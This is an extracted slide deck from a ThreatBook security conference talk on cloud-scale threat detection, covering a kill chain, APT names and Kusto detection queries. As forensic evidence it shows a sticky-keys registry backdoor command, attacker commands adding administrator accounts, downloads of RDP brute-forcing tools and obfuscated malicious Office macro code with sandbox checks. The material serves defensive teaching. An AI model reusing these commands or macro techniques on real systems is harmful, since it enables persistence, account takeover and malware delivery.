j q~Ü[ qhrg n `Åb¥y'o · port scanning potential victims reconnaissance weaponization...

34
ThreatBook首届网络安全分析与情报大会

Upload: others

Post on 07-Aug-2020

1 views

Category:

Documents


0 download

TRANSCRIPT

Page 1: J Q~Ü[ QhRg N `Åb¥Y'O · Port Scanning potential victims Reconnaissance Weaponization Delivery Exploitation Installation C2 Actions on Intent Installation of RDP brute-forcing

ThreatBook首届网络安全分析与情报大会

Page 2: J Q~Ü[ QhRg N `Åb¥Y'O · Port Scanning potential victims Reconnaissance Weaponization Delivery Exploitation Installation C2 Actions on Intent Installation of RDP brute-forcing

• Militarization of cyber space

• The "5th domain“

• Geopolitics increasingly colors national views

• Data sovereignty

• Supply chain attacks

• Cyber trickle down

ThreatBook首届网络安全分析与情报大会

Page 3: J Q~Ü[ QhRg N `Åb¥Y'O · Port Scanning potential victims Reconnaissance Weaponization Delivery Exploitation Installation C2 Actions on Intent Installation of RDP brute-forcing

• Miniaturization is shrinking

computing form factors, all

powered by cloud services

• SMB and Enterprises seeking IT

services through SaaS

• Adversaries and threats

following them to the

cloud

• Customers adapting to

cloud threats

The new form

factors: Dual

core, WiFi,

Bluetooth,

runs Linux

OneDrive

• 12 billion files

Skype is the largest long

distance provider

• 2 Billion mins/day

O365

• 32M paid seats, 600K paid

tenants

• 35 PB of email data

• 15B messages per month

Outlook.com

• 400 Million active users

ThreatBook首届网络安全分析与情报大会

Page 4: J Q~Ü[ QhRg N `Åb¥Y'O · Port Scanning potential victims Reconnaissance Weaponization Delivery Exploitation Installation C2 Actions on Intent Installation of RDP brute-forcing

• Demand for SaaS driving hyperscale

cloud growth

• Brings economic dividend driving

down prices in compute, storage, and

networking

• Defenders harnessing new capabilities

• Some skillsets finding new life in cyber

200+ cloud services

1+ million servers

100+ datacenters in

global cloud portfolio

$15B+ infrastructure

investment

ThreatBook首届网络安全分析与情报大会

Page 5: J Q~Ü[ QhRg N `Åb¥Y'O · Port Scanning potential victims Reconnaissance Weaponization Delivery Exploitation Installation C2 Actions on Intent Installation of RDP brute-forcing

1 billion customers across enterprise and consumer segments

200+ cloud services

ThreatBook首届网络安全分析与情报大会

Page 6: J Q~Ü[ QhRg N `Åb¥Y'O · Port Scanning potential victims Reconnaissance Weaponization Delivery Exploitation Installation C2 Actions on Intent Installation of RDP brute-forcing

ThreatBook首届网络安全分析与情报大会

Page 7: J Q~Ü[ QhRg N `Åb¥Y'O · Port Scanning potential victims Reconnaissance Weaponization Delivery Exploitation Installation C2 Actions on Intent Installation of RDP brute-forcing

ThreatBook首届网络安全分析与情报大会

Page 8: J Q~Ü[ QhRg N `Åb¥Y'O · Port Scanning potential victims Reconnaissance Weaponization Delivery Exploitation Installation C2 Actions on Intent Installation of RDP brute-forcing

Actor Code Name

HeHELIUM

BBORON

CCARBON

ScSCANDIUM

Industry Name

APT3

APT17

Wild

Neutron

APT8, APT18

ThreatBook首届网络安全分析与情报大会

Page 9: J Q~Ü[ QhRg N `Åb¥Y'O · Port Scanning potential victims Reconnaissance Weaponization Delivery Exploitation Installation C2 Actions on Intent Installation of RDP brute-forcing

10ThreatBook首届网络安全分析与情报大会

Page 10: J Q~Ü[ QhRg N `Åb¥Y'O · Port Scanning potential victims Reconnaissance Weaponization Delivery Exploitation Installation C2 Actions on Intent Installation of RDP brute-forcing

Phish for Credentials Reconnaissance

ThreatBook首届网络安全分析与情报大会

Page 11: J Q~Ü[ QhRg N `Åb¥Y'O · Port Scanning potential victims Reconnaissance Weaponization Delivery Exploitation Installation C2 Actions on Intent Installation of RDP brute-forcing

Formula

𝑟𝑖𝑠𝑘 𝐼𝑃 = max(σ𝑈 ∈𝑂𝑤𝑛𝑒𝑑 𝐿𝑜𝑔𝑜𝑛𝐸𝑥𝑖𝑠𝑡𝑠(𝐼𝑃, 𝑈) - σ𝑈 ∈𝑁𝑜𝑛𝑂𝑤𝑛𝑒𝑑 𝐿𝑜𝑔𝑜𝑛𝐸𝑥𝑖𝑠𝑡𝑠(𝐼𝑃, 𝑈), 0)

where 𝐿𝑜𝑔𝑜𝑛𝐸𝑥𝑖𝑠𝑡𝑠: (𝐼𝑃, 𝑈) → {0, 1}

ThreatBook首届网络安全分析与情报大会

Page 12: J Q~Ü[ QhRg N `Åb¥Y'O · Port Scanning potential victims Reconnaissance Weaponization Delivery Exploitation Installation C2 Actions on Intent Installation of RDP brute-forcing

ThreatBook首届网络安全分析与情报大会

Page 13: J Q~Ü[ QhRg N `Åb¥Y'O · Port Scanning potential victims Reconnaissance Weaponization Delivery Exploitation Installation C2 Actions on Intent Installation of RDP brute-forcing

ThreatBook首届网络安全分析与情报大会

Page 14: J Q~Ü[ QhRg N `Åb¥Y'O · Port Scanning potential victims Reconnaissance Weaponization Delivery Exploitation Installation C2 Actions on Intent Installation of RDP brute-forcing

ThreatBook首届网络安全分析与情报大会

Page 15: J Q~Ü[ QhRg N `Åb¥Y'O · Port Scanning potential victims Reconnaissance Weaponization Delivery Exploitation Installation C2 Actions on Intent Installation of RDP brute-forcing

ThreatBook首届网络安全分析与情报大会

Page 16: J Q~Ü[ QhRg N `Åb¥Y'O · Port Scanning potential victims Reconnaissance Weaponization Delivery Exploitation Installation C2 Actions on Intent Installation of RDP brute-forcing

2016-04-11 16:35:22.4527963 winlogon.exe2016-04-11 16:35:22.4527963 winlogon.exe2016-04-11 16:35:23.0309213 """LogonUI.exe"" /flags:0x0"2016-04-11 16:35:27.1090463 C:\Windows\system32\userinit.exe

2016-04-11 16:35:27.5152963 C:\Windows\Explorer.EXE2016-04-11 16:35:35.1246395 """C:\Windows\System32\ie4uinit.exe"" -EnableTLS"

2016-04-11 16:35:35.1402644 """C:\Windows\System32\ie4uinit.exe"" -DisableSSL3"2016-04-11 16:35:35.1402644 """C:\Windows\System32\regsvr32.exe"" /s /n /i:U shell32.dll"2016-04-11 16:35:35.7183857 """C:\Windows\System32\rundll32.exe"" C:\Windows\system32\mscories.dll2016-04-11 16:35:36.1871327 C:\Windows\SysWOW64\runonce.exe /Run6432

2016-04-11 16:35:36.3746315 """C:\Program Files\McAfee\Agent\x86\UpdaterUI.exe"" /StartedFromRunKey"2016-04-11 16:35:39.1714886 """C:\Windows\explorer.exe"""2016-04-11 16:36:03.4213334 """C:\Windows\System32\cmd.exe"""

2016-04-11 16:36:15.2181329 "REG ADD ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"" /v Debugger /t REG_SZ /d ""C:\windows\system32\cmd.exe"""

ProdProcessCreationEvents | where NewProcessName endswith "\\reg.exe" | where CommandLine contains "Image File Execution Options" andCommandLine contains " add " | where CommandLine contains "\\sethc.exe" or CommandLine contains "\\magnify.exe" or CommandLine contains"\\utilman.exe" or CommandLine contains "\\osk.exe" | project Subscription , TimeCreated , NewProcessName, CommandLine , SubjectUserName , SubjectLogonId

ProdProcessCreationEvents |where Subscription == "2e5d8c75-18cc-45d3-b580-7e09a91232fa" | where TimeCreated > datetime(2016-04-11 16:25:15.2181329) and TimeCreated < datetime(2016-04-17 16:50:15.2181329) |where Computer == "..." | where SubjectUserName == "..."| where NewProcessName endswith "\\cmd.exe" | where CommandLine contains "sethc" | project Subscription , TimeCreated , NewProcessName, CommandLine , SubjectUserName , SubjectLogonId

TimeCreated CommandLine SubjectLogonId2016-04-16 18:59 C:\windows\system32\cmd.exe sethc.exe 211 0x3e7

ThreatBook首届网络安全分析与情报大会

Page 17: J Q~Ü[ QhRg N `Åb¥Y'O · Port Scanning potential victims Reconnaissance Weaponization Delivery Exploitation Installation C2 Actions on Intent Installation of RDP brute-forcing

ProdLoginAuditEvents | where TimeCreated > datetime(2016-04-15 23:10:25.9896262) and TimeCreated < datetime(2016-04-15 23:20:25.98962623)| where Subscription == "..." and VMName == "..." | project Subscription, TimeCreated ,Computer, TargetUserName , IpAddress , SubjectUserName , LogonType , IpPort

Detections * Hits = Threat Intel + 1

ThreatBook首届网络安全分析与情报大会

Page 18: J Q~Ü[ QhRg N `Åb¥Y'O · Port Scanning potential victims Reconnaissance Weaponization Delivery Exploitation Installation C2 Actions on Intent Installation of RDP brute-forcing

C:\Windows\Explorer.EXEC:\Users\ADMINI~1\AppData\Local\Temp\3\wrsd.exe 429308 zreg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 1 /freg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 1 /freg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v legalnoticecaption /freg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v legalnoticetext /fnet user ASPNET crystal123!@# /addnet localgroup Administrators ASPNET /addnet user ___VMware_Conv_SA___ crystal123!@# /addnet localgroup Administrators ___VMware_Conv_SA___ /add"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4816 CREDAT:267521 /prefetch:2"C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\FB7Z3X4W\TurboMailer-Setup.exe""C:\Program Files (x86)\TurboMailer\TurboMailer.exe""C:\Windows\system32\NOTEPAD.EXE" C:\Users\Administrator\Desktop\400k\400k.txt"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Administrator\AppData\Local\Temp\3\Temp1_DUB8.2.zip\DUB8.2\config.ini"C:\Users\Administrator\AppData\Local\Temp\3\Temp1_DUB8.2.zip\DUB8.2\DUB8.2.exe"net user guest"C:\Program Files (x86)\TurboMailer\turbomailer.exe""C:\Windows\system32\NOTEPAD.EXE" C:\Users\Administrator\Desktop\april17.txt"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Administrator\AppData\Local\Temp\3\Temp1_march.zip\march.txt"C:\Users\Administrator\Downloads\dn2.exe""C:\Users\Administrator\Downloads\f.exe""C:\Users\Administrator\Downloads\x.exe""C:\Users\Administrator\Downloads\y.exe""C:\Users\Administrator\Downloads\dn2.exe""C:\Users\Administrator\Downloads\Stable_DUBrute_2.1\DUBrute 2.1 (UPDATE 03.03.12)\DUBrute.exe""C:\Windows\system32\NOTEPAD.EXE" C:\Users\Administrator\Downloads\Stable_DUBrute_2.1\DUBrute 2.1 (UPDATE 03.03.12)\good.txt"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Administrator\Downloads\Stable_DUBrute_2.1\DUBrute 2.1 (UPDATE 03.03.12)\Logins.txt"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Administrator\Downloads\Stable_DUBrute_2.1\DUBrute 2.1 (UPDATE 03.03.12)\Passwords.txt"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" -- "http://119.10.151.120:1234/3.zip""C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Administrator\Downloads\DUBrute 2.1 (UPDATE 03.03.12)\ssleay32.dll"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Administrator\Downloads\DUBrute 2.1 (UPDATE 03.03.12)\config.ini"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" -- "http://ys-h.ys168.com/3.0/548253621/SIuMfJl7K3T5561HXPJK/DUB_8.0.zip""C:\Windows\system32\NOTEPAD.EXE" C:\Users\Administrator\Downloads\DUBrute_8.0\admin.txt"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Administrator\Downloads\DUBrute_8.0\password.txt"C:\Users\Administrator\Downloads\DUBrute_8.0\DUBrute.exe"

wrsd.exe 429308 z

reg delete ...legalnoticecaption

net user ASPNET crystal123!@# /addnet user ___VMware_Conv_SA___ crystal123!@# /addnet localgroup Administrators ASPNET /addnet localgroup Administrators ___VMware_Conv_SA___ /add…

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" ...Temporary Internet Files\...\TurboMailer-Setup.exe""C:\Program Files (x86)\TurboMailer\TurboMailer.exe"NOTEPAD.EXE C:\Users\Administrator\Desktop\400k\400k.txt

chrome.exe -- "http://ys-h.ys168.com/3.0/.../DUB_8.0.zip""DUBrute.exe""C:\Windows\system32\NOTEPAD.EXE" good.txt"C:\Windows\system32\NOTEPAD.EXE" Logins.txt"C:\Windows\system32\NOTEPAD.EXE" Passwords.txt

ThreatBook首届网络安全分析与情报大会

Page 19: J Q~Ü[ QhRg N `Åb¥Y'O · Port Scanning potential victims Reconnaissance Weaponization Delivery Exploitation Installation C2 Actions on Intent Installation of RDP brute-forcing

Port Scanning potential victims

Reconnaissance Weaponization Delivery Exploitation Installation C2Actions on

Intent

Installation of RDP brute-forcing tools, email lists installed for spamming, ...

RDP brute forcing, SQL injection, Elastic Search injection, exploits for known server vulnerabilities, …

Successful login with brute forced credential, successful SQLi, …

Malware installed

Malware communicates for updates

Spam, Bitcoin mining, …

Exploit any detection to devise cloud kill chain coverage

Analyst

Investigation

Host

detection

Network

Detection

Crash

Detection

Forensics

Detection

Exploit the “Fibonacci model” to build detection arsenal:

1 analytic leads to…

1 detection. Investigation yields…

2 more attack elements. Searching all tenants leads to…

3 more affected tenants. Investigating them leads to…

5 new attack elements. Adding coverage leads to…

…Iterate until the closure of the pivoting

A detection fires…

Investigation is

performed,

identifying:

• New analytic ideas

• New TI

ThreatBook首届网络安全分析与情报大会

Page 20: J Q~Ü[ QhRg N `Åb¥Y'O · Port Scanning potential victims Reconnaissance Weaponization Delivery Exploitation Installation C2 Actions on Intent Installation of RDP brute-forcing

ThreatBook首届网络安全分析与情报大会

Page 21: J Q~Ü[ QhRg N `Åb¥Y'O · Port Scanning potential victims Reconnaissance Weaponization Delivery Exploitation Installation C2 Actions on Intent Installation of RDP brute-forcing

ThreatBook首届网络安全分析与情报大会

Page 22: J Q~Ü[ QhRg N `Åb¥Y'O · Port Scanning potential victims Reconnaissance Weaponization Delivery Exploitation Installation C2 Actions on Intent Installation of RDP brute-forcing

Attribute VB_Name = "Sg4H8a2snIHP4xK"Public Function xki6L8mqtQ0ozcI(ByVal JSb4Ora5tv As Integer, ByVal liYA5YlWC As Variant) As VariantDim UsQ2uSe88ea1 As IntegerDim jzs7U5 As IntegerDim c8BXPU As IntegerDim LrtUkopVK2jN As IntegerDim eijYuhL As Integer, jHL4QnMI1UkOF6 As IntegerOn Error GoTo BoVCD5N3T0ThisDocument.D6hG9UqMW2sdKSxki6L8mqtQ0ozcI = liYA5YlWCExit FunctionBoVCD5N3T0:c8BXPU = ZKHa67bidtfu(liYA5YlWC)jzs7U5 = ThisDocument.AUsmTZj(JSb4Ora5tv, c8BXPU)UsQ2uSe88ea1 = c8BXPU / jzs7U5For jHL4QnMI1UkOF6 = ThisDocument.MkNcK9 To jzs7U5For eijYuhL = 0 To UsQ2uSe88ea1xki6L8mqtQ0ozcI = zfF40kszAh1zU.zqvhMF4qd(xki6L8mqtQ0ozcI, …

Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As LongPrivate Declare Function WriteFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Byte, ByVal dwNumberOfBytesToWrite As Long, lpNumberOfBytesWritten As Long, ByVallpOverlapped As Long) As LongPrivate Declare Function GetTempPath Lib "kernel32" Alias "GetTempPathA" (ByValnBufferLength As Long, ByVal lpBuffer As String) As LongPrivate Declare Function GetTempFileName Lib "kernel32" Alias "GetTempFileNameA" (ByVal lpPathName As String, ByVal lpPrefixString As String, ByVal uUnique As Long, ByVal lpTempFileName As String) As LongPrivate Sub runblackice()On Error Resume Nextfilestring = filestring = filestring + filestring = filestring + "VwBvAHIAawBzAHAAYQBjAGUAIABTAHQAYQB0AGUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAgECAAAABAAAAP////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAABQAAAAAAABCAHIAbwB3AHMAZQByAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAACAAMAAAAHAAAA/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwAAAAAFAAAAAAAAEUAZABpAHQAbwByAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOAAIB////////////////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFgAAAAAUAAAAAAAA"

bupvupdyu = afpkh.ExpandEnvironmentStrings(pedugbr(Array(240, (8405 - 8257), (-8353 + 8486), (4508 - 4375), (-4516 + 4661), (8215 _- 8067), (-221 + 350), (-8839 + 8987), (2865 - 2625), (5557 - 5420), 148, (-8210 + 8387), (-3782 + 3968), (-9105 + 9288), (-8111 + 8287), _137, 148, (2515 - 2359), (5998 - 5863), 137, (-37 + 217), 175, 178, (-5460 + 5632), (-7127 + 7294), (-4668 + 4847), 189, (332 - 160), ( _-9117 + 9368), (-446 + 623), (2217 - 2037), (4051 - 3890)), (9832 - 9619)))Set scgzdrkmc = byfivenf.CreateTextFile(bupvupdyu)If Err.Number <> (9752 - 9752) ThenDim ejuyjco As StringDim pkjhnpvxnejuyjco = pedugbr(Array(), (-2644 + 2727))pkjhnpvxn = Split(bupvupdyu, pedugbr(Array((2924 - 2825)), (7128 - 7065)))wolfmy = UBound(pkjhnpvxn)If Mid(bupvupdyu, Len(bupvupdyu), (-1676 + 1677)) <> pedugbr(Array((-2597 + 2849)), (-2010 + 2170)) Then wolfmy = wolfmy - (-4391 _+ 4392)

ehhpzr = ehhpzr & LVRiDty & nsZIrFO & eZGZLMe & TDAcru & kQBVrj & UwVihX & ZwZbfW & QsGoTb & lrhxjI & xttVlQa & tRbpRPL & pRRbsEH & rQeqZg & HABrov & kbGliiI & KsxHlO & STIUTu & lYVZuG & tPyNlL & CBvstp & YyNArAf & nZKJBK & MofWYGr & DDadug & LLiVePZehhpzr = ehhpzr & cRujae & BKoqYwa & vyNFfG & FQHXTIk & lckFda & TFnlWAj & tdrzhUq & smSGxU & tbwObc & hymUPc & SXmEBPW & TzHxJN & eTRcXOB & isJoPG & wWYfLB & zsOcBF & KKlHQWk & GAUhcB & BXlStJL & yNizpu & WCcClJr & movhdmF & NXTOcu & pMqmrJ & RuxVkxehhpzr = ehhpzr & dsDbJCr & WcLFRA & xAQkNY & wtaPKs & LxMpHUz & eGZaocg & GVTPxoo & rQDhMG & cBblHn & DsRfOhd & eWPurMU & qmwnHTO & pYQlooj & xDZEPW & xEPoIu & foIOkh & WIkDSM & lPnQrqI & DeVhut & tDPitaP & GcDlHJD & TfBhrfd & oJKcAVV & VoNtQRp & oWwggELKatdx & zlJPuy & KCYbUF & HiMWEvW & tACQbxz & TdFOvON & KpjCfTl & iFmDTdJ & vxBTxig& JdUbOfehhpzr = ehhpzr & ZkDCLuH & QoPruhI & YevAqf & aXsRkuRSet oScript = CreateObject(jfzvQr & ttojQNT & nkWAiS & slKOuqD & tLTWJX & FDWhxr & XiVbbH & fnsMYuL & ANGaHu & hQTvJn)oScript.Language = cRDKjqJ & NNyPaYU & YWARXWzoScript.Eval (ehhpzr)

Infinite possibilities to evade AV signatures

ThreatBook首届网络安全分析与情报大会

Page 23: J Q~Ü[ QhRg N `Åb¥Y'O · Port Scanning potential victims Reconnaissance Weaponization Delivery Exploitation Installation C2 Actions on Intent Installation of RDP brute-forcing

ThreatBook首届网络安全分析与情报大会

Page 24: J Q~Ü[ QhRg N `Åb¥Y'O · Port Scanning potential victims Reconnaissance Weaponization Delivery Exploitation Installation C2 Actions on Intent Installation of RDP brute-forcing

248a5f02d176d2355bd6191724f5dcf49614fb4d

ThreatBook首届网络安全分析与情报大会

Page 25: J Q~Ü[ QhRg N `Åb¥Y'O · Port Scanning potential victims Reconnaissance Weaponization Delivery Exploitation Installation C2 Actions on Intent Installation of RDP brute-forcing

If Application.UserName = s("SPWSBPU", 19, 12) Then Error out

If Application.RecentFiles.Count < 3 Then Error out

ThreatBook首届网络安全分析与情报大会

Page 26: J Q~Ü[ QhRg N `Åb¥Y'O · Port Scanning potential victims Reconnaissance Weaponization Delivery Exploitation Installation C2 Actions on Intent Installation of RDP brute-forcing

https://www.maxmind.com

/geoip/v2.1/city/me

https://wtfismyip.com/json

{

"YourIPAddress": "98.173.91.135",

"YourLocation": "Morristown, NJ, United States",

"YourHostname": "wsip-98-173-91-135.lv.lv.cox.net",

"YourISP": "Cox Communications",}

ThreatBook首届网络安全分析与情报大会

Page 27: J Q~Ü[ QhRg N `Åb¥Y'O · Port Scanning potential victims Reconnaissance Weaponization Delivery Exploitation Installation C2 Actions on Intent Installation of RDP brute-forcing

If ISP is on black list, error out with ‘bad

ISP’

Network Vetting

ThreatBook首届网络安全分析与情报大会

Page 28: J Q~Ü[ QhRg N `Åb¥Y'O · Port Scanning potential victims Reconnaissance Weaponization Delivery Exploitation Installation C2 Actions on Intent Installation of RDP brute-forcing

0

500

1000

1500

2000

2500

3000

Common Campaign Profile – New malware variant - Before

系列1 系列6 系列7

0

500

1000

1500

2000

2500

3000

Common Campaign Profile – New malware variant - Today

系列1 系列2 系列3 系列5 系列6 系列7

29

Proactive threshold met

Sonar verdict

received

HFH Published

Signatures

available

ThreatBook首届网络安全分析与情报大会

Page 29: J Q~Ü[ QhRg N `Åb¥Y'O · Port Scanning potential victims Reconnaissance Weaponization Delivery Exploitation Installation C2 Actions on Intent Installation of RDP brute-forcing

1. Static File Analysis

• Spoofed Icon, Obfuscated Macro,

Specific Signatures

2. Application Behavior Analysis

• Checks Recent File count, Shell

Breakout

3. Operating System Interactions

• Encrypts Files, Runs Powershell

cmd

4. Network Interactions

• Geo IP check, Unusual HTTP

headers, Downloads obfuscated

Executable

ThreatBook首届网络安全分析与情报大会

Page 30: J Q~Ü[ QhRg N `Åb¥Y'O · Port Scanning potential victims Reconnaissance Weaponization Delivery Exploitation Installation C2 Actions on Intent Installation of RDP brute-forcing

ThreatBook首届网络安全分析与情报大会

Page 31: J Q~Ü[ QhRg N `Åb¥Y'O · Port Scanning potential victims Reconnaissance Weaponization Delivery Exploitation Installation C2 Actions on Intent Installation of RDP brute-forcing

SIGNALS

Azure network flows

(IPFIX)

THE “CLOUD EFFECT”

Learning using office365 labels

SPAM / NOT SPAM

ALERT

Differentiate between a

network anomaly and a real

SPAM campaign

ThreatBook首届网络安全分析与情报大会

Page 32: J Q~Ü[ QhRg N `Åb¥Y'O · Port Scanning potential victims Reconnaissance Weaponization Delivery Exploitation Installation C2 Actions on Intent Installation of RDP brute-forcing

ThreatBook首届网络安全分析与情报大会

Page 33: J Q~Ü[ QhRg N `Åb¥Y'O · Port Scanning potential victims Reconnaissance Weaponization Delivery Exploitation Installation C2 Actions on Intent Installation of RDP brute-forcing

ThreatBook首届网络安全分析与情报大会

Page 34: J Q~Ü[ QhRg N `Åb¥Y'O · Port Scanning potential victims Reconnaissance Weaponization Delivery Exploitation Installation C2 Actions on Intent Installation of RDP brute-forcing

Questions?

ThreatBook首届网络安全分析与情报大会